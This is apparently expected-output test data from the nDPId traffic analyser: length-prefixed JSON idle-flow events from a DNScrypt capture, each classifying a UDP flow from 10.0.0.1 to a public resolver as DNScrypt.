-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337188,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317494,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318202,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305331,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":46856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380984,"flow_last_seen":946739381017,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":57090,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317432,"flow_last_seen":946739317460,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":41717,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305461,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":33565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304806,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":46229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37123,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299355,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305187,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380837,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348913,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348805,"flow_last_seen":946739348916,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":57180,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400550,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49568,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318169,"flow_last_seen":946739318200,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402357,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":34024,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":51509,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312464,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":42156,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312463,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":46255,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312181,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":45987,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317829,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396216,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337078,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":38310,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305348,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":40009,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304804,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":38136,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396069,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
